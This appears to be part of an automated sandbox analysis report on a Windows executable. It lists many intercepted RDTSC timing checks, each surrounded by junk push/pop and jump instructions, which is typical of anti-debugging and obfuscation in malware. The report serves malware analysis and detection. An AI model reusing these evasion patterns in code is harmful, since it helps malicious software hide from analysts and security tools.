Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD77A second address: 6AD77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD77E second address: 6AD784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD784 second address: 6AD7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8DCA1A6h 0x00000008 jmp 00007F46B8DCA1A9h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F46B8DCA196h 0x00000016 jmp 00007F46B8DCA19Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD7C9 second address: 6AD7DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jg 00007F46B8B98B06h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD7DD second address: 6AD7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F46B8DCA1A0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD7F3 second address: 6AD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD7F7 second address: 6AD7FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ADC15 second address: 6ADC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ADC1B second address: 6ADC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ADC1F second address: 6ADC29 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ADC29 second address: 6ADC30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ADC30 second address: 6ADC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 ja 00007F46B8B98B06h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F46B8B98B19h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622B59 second address: 622B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622B5D second address: 622B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B022C second address: 6B0251 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F46B8DCA196h 0x00000008 jc 00007F46B8DCA196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F46B8DCA19Eh 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edi 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B1B4E second address: 6B1BA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B12h 0x00000007 jmp 00007F46B8B98B18h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F46B8B98B0Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F46B8B98B15h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B1BA2 second address: 6B1BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B1BA6 second address: 6B1BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B4384 second address: 6B438A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B438A second address: 6B438E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B438E second address: 6B439B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B9670 second address: 6B9686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 js 00007F46B8B98B0Ch 0x0000000d jng 00007F46B8B98B06h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D28 second address: 6B8D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F46B8DCA19Fh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D3E second address: 6B8D44 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D44 second address: 6B8D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D4A second address: 6B8D76 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F46B8B98B0Dh 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push edi 0x00000013 jl 00007F46B8B98B06h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e jp 00007F46B8B98B06h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8EE6 second address: 6B8EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8EF1 second address: 6B8F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B12h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8F07 second address: 6B8F13 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F46B8DCA196h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8F13 second address: 6B8F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F46B8B98B10h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8F2F second address: 6B8F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8F35 second address: 6B8F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9219 second address: 6B921F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B921F second address: 6B9223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC3A second address: 6BEC3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC3F second address: 6BEC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC5C second address: 6BEC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD5F3 second address: 6BD5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD5F7 second address: 6BD61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F46B8DCA1A4h 0x00000009 jmp 00007F46B8DCA19Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD79D second address: 6BD7A7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F46B8B98B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD935 second address: 6BD945 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F46B8DCA196h 0x00000008 ja 00007F46B8DCA196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDAF7 second address: 6BDAFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDD35 second address: 6BDD39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDD39 second address: 6BDD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDD42 second address: 6BDD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F46B8DCA196h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668B9A second address: 668B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668B9F second address: 668BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668BA5 second address: 668C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F46B8B98B0Bh 0x0000000e ja 00007F46B8B98B0Ch 0x00000014 popad 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F46B8B98B08h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D39D6h] 0x00000036 xor dx, 3BAEh 0x0000003b mov ebx, dword ptr [ebp+12479BE3h] 0x00000041 and edx, dword ptr [ebp+122D30A8h] 0x00000047 add eax, ebx 0x00000049 push 00000000h 0x0000004b push edx 0x0000004c call 00007F46B8B98B08h 0x00000051 pop edx 0x00000052 mov dword ptr [esp+04h], edx 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc edx 0x0000005f push edx 0x00000060 ret 0x00000061 pop edx 0x00000062 ret 0x00000063 pushad 0x00000064 mov dword ptr [ebp+122D2F27h], eax 0x0000006a popad 0x0000006b push eax 0x0000006c push esi 0x0000006d jc 00007F46B8B98B0Ch 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDEBF second address: 6BDEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDEC5 second address: 6BDECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDECF second address: 6BDED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDED4 second address: 6BDED9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDED9 second address: 6BDEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDEE6 second address: 6BDEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDEEA second address: 6BDEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE982 second address: 6BE986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1110 second address: 6C1139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F46B8DCA19Fh 0x0000000c jmp 00007F46B8DCA1A3h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1139 second address: 6C115F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007F46B8B98B17h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C115F second address: 6C1165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1750 second address: 6C1756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1756 second address: 6C175B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C175B second address: 6C1767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F46B8B98B06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CA27B second address: 6CA28A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F46B8DCA19Ah 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C85FD second address: 6C8603 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C88D9 second address: 6C88DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C88DF second address: 6C88E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C88E5 second address: 6C88EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C88EB second address: 6C8901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F46B8B98B0Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8901 second address: 6C8907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8BBA second address: 6C8BDA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F46B8B98B16h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8BDA second address: 6C8BE9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F46B8DCA19Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8BE9 second address: 6C8BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 js 00007F46B8B98B06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9181 second address: 6C9185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C943F second address: 6C9448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9448 second address: 6C9452 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F46B8DCA196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9452 second address: 6C945B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C945B second address: 6C94A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F46B8DCA196h 0x0000000a jo 00007F46B8DCA196h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F46B8DCA19Fh 0x00000018 popad 0x00000019 pushad 0x0000001a push esi 0x0000001b jns 00007F46B8DCA196h 0x00000021 pop esi 0x00000022 pushad 0x00000023 jmp 00007F46B8DCA1A7h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CEC12 second address: 6CEC28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F46B8B98B06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3F70 second address: 6D3F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3F75 second address: 6D3F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3997 second address: 6D39B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A5h 0x00000007 jne 00007F46B8DCA196h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D39B6 second address: 6D39C0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F46B8B98B0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3B55 second address: 6D3B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F46B8DCA196h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3B60 second address: 6D3B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3B66 second address: 6D3B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3B6C second address: 6D3B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CBD second address: 6D3CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CC1 second address: 6D3CCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F46B8B98B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CCB second address: 6D3CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CD1 second address: 6D3CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CD6 second address: 6D3CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F46B8DCA196h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edi 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC450 second address: 6DC456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA950 second address: 6DA954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA954 second address: 6DA95A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA95A second address: 6DA960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA960 second address: 6DA966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA966 second address: 6DA96A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DABAE second address: 6DABB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DABB2 second address: 6DABB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DABB6 second address: 6DABE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jo 00007F46B8B98B06h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DABE0 second address: 6DABE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
